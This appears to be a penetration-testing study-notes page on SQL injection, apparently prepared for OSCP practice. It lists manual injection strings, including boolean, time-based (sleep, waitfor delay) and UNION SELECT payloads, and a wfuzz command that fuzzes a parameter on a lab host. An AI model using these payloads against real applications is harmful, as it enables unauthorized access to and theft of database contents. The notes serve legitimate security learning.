// notes/ Web Exploitation
🕸️
SQL Injection
<strong' order by 1 -- -
#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection ↗SQL Injection
Manual
<pre><code>' or 1=1 ' or 1=1-- - ' or 1=1# ' or 1=1/ ' or 1=1-- - // <strong>' order by 1 -- - </strong>' order by 1-- # ' or sleep(5)-- - " or sleep(5)=" ' or sleep(5)=' 'waitfor delay '0:0:5'-- ;waitfor delay '0:0:5'-- ';waitfor delay '0:0:5'-- ' AND IF (1=1, sleep(3),'false') -- // union select <number of columns> </code></pre>{% hint style="info" %} AND can be used to replace OR as well {% endhint %}
code
01%02If an application accepts a % as a wildcard the query most likely is putting 03%'s inbetween the input (%joe%) to find something "like" the input{% hint style="info" %}
Test on php applications like for example
{% endhint %}
Fuzz with special characters
code
01wfuzz -u http://box.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404After finding an injection spot try to figure out how the query is structured
{% embed url="https://dev.mysql.com/doc/refman/8.4/en/select.html" %}
{% hint style="info" %} With UNION SELECT you must have the same amount of parameters on the right side as you do on the left {% endhint %}
{% embed url="https://htb.adot8.com/hack-the-box/oscp-like-boxes/linux/jarvis/eumeration/80" %}
If the initial query is false then we can overwrite the output. We can insert payloads into one of the parameters
code
01union select 1,2,(<Payload>),3,4,5,6,7